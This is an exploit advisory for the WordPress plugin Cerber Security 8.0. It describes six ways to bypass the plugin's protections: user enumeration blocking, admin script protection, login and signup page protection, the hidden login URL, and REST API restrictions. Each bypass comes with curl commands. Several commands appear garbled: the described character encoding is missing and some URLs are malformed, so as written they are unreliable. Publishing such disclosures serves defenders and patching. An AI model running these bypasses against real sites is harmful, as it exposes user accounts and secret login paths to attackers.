WordPress Plugin Cerber Security, Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities
2019-03-04 15:05:13# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
[Vulnerabilities]
#1: Stop user enumeration bypass:
U can bypass user enumeration protection if u use Post method instead of Get.
curl http://localhost/ -d author=1
#2: Protect admin scripts bypass:
U can bypass admin scripts protection if u add one or more slashes to the uri.
curl 'http://localhost/wp-admin///load-scripts.php?load[]=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load[]=dashicons,admin-bar'
#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
U can bypass this protection if u encode any character in the uri.
curl http://localhost/wp-login.php
curl -v http://localhost/wp-signup.php
curl -v http://localhost/wp-register.php
#4: Hide login URL bypass:
U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.
curl -I http://localhost/wp-admin/
#5: Stop user enumeration via REST API bypass:
U can bypass if u insert /index.php/ between domain and rest route.
curl http:/localhost/index.php/wp-json/wp/v2/users/
#6: Disable REST API bypass:
Same above.
curl http:/localhost/index.php/wp-json/wp/v2/
--ed0x21son
Fixes
No fixesIn order to submit a new fix you need to be registered.